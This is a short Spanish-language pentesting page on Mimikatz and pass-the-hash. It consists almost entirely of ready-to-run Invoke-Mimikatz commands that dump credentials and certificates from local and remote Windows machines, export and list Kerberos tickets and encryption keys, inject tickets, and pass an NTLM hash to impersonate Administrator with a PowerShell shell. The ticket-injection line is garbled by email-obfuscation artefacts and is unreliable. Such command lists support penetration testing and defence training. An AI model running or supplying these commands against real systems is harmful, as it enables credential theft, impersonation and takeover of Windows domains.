Comment on page
Mimikatz & PassTheHash
Es la herramienta más usada para extraer hashes y contraseñas de máquinas Windows, que podemos obtener desde su repositorio.
Las credenciales del dominio se almacenan en el fichero ntds.dit en la máquina del Domain Controller (DC).
- Obtener credenciales en la máquina local
Invoke-Mimikatz -DumpCreds
- Obtener certificados en la máquina local
Invoke-Mimikatz –DumpCerts
- Obtener credenciales de varias máquinas remotas
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")
- Exportar todos los tickets de la máquina
Invoke-Mimikatz -Command '"kerberos::list /export"'
- Listar los tickets de los usuarios autenticados en la máquina local
Invoke-Mimikatz –Command '"sekurlsa::tickets"'
- Listar claves de cifrado de Kerberos
Invoke-Mimikatz –Command '"sekurlsa::ekeys"'
- Inyectar ticket
Invoke-Mimikatz -Command '"kerberos::ptt [email protected]@DOMIAIN.LOCAL_cifs~dcorpmssql.dollarc[email protected]"'
Usa el hash NTLM de un usuario para suplantar su identidad. En este caso también abre una consola de powershell.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:<ntlmhash> /run:powershell.exe"'
Last modified 10mo ago